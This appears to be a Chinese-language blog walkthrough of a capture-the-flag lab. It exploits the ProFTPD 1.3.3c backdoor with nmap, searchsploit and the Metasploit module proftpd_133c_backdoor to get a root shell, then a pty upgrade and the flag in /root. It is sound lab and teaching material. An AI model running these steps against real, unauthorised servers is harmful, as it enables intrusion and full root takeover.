FTP服务后门利用
FTP服务后门利用
1. 信息探测
1 | nmap -sV IP # 扫描主机服务信息以及服务版本 |
发现FTP服务(端口号为21)
记录FTP软件名以及版本号
2. 漏洞利用
1.漏洞查找
1.1SearchSploit”漏洞查找工具
“SearchSploit”是一个用于Exploit-DB的命令行搜索工具(已经默认在Kali中安装),可以查找渗透模块。Exploit-DB是一个漏洞库,Kali Linux中保存了一个该漏洞库的拷贝,它将搜索所有的漏洞和shellcode而且该漏洞库是保存在本地的,在没有网络的情况下也可以使用。它不会包含任何文件和谷歌黑客数据库的结果。终端输入”searchsploit”启动。
1.2查找漏洞
FTP服务为“ProFTPD 1.3.3c”版本
1 | searchsploit ProFTPD 1.3.3c |
发现存在后门,可以尝试远程溢出。既可以通过修改对应文件中的源代码(修改某些参数)进而执行远程溢出从而利用漏洞(第一行,此方法较复杂),也可以使用Metasploit工具利用该漏洞(输出结果的第二行表示Metasploit工具已集成该漏洞)。
我们使用第二种方法
2.漏洞利用
利用Metasploit进行远程溢出攻击
1 | msfconsole //启动Metasploit工具 |
1 | msf6 > use exploit/unix/ftp/proftpd_133c_backdoor //利用exp |
1 | msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options //显示参数(输入时可用tab键补全) |
1 | msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 192.168.43.174 //设置靶机ip |
1 | msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit //开始利用漏洞 |
成功拿到反弹shell,且当前账户拥有root权限。(注:最后一句提示“Command shell session 1 opened”说明会话已经开启,并且下面出现光标,此时即可输入指令。)
但是此会话跟终端有区别,于是我们优化终端
1 | python -c "import pty; pty.spawn('/bin/bash')" //优化终端 |
3.获取flag
一般flag在根目录也就是/root中
1 | cd /root //进入root目录 |
成功获取flag
- Title: FTP服务后门利用
- Author: Dunm1e
- Created at : 2024-09-11 18:18:55
- Updated at : 2024-09-20 17:13:34
- Link: https://dunm1e.github.io/2024/09/11/602e2b077e4b/
- License: This work is licensed under CC BY-NC-SA 4.0.
Comments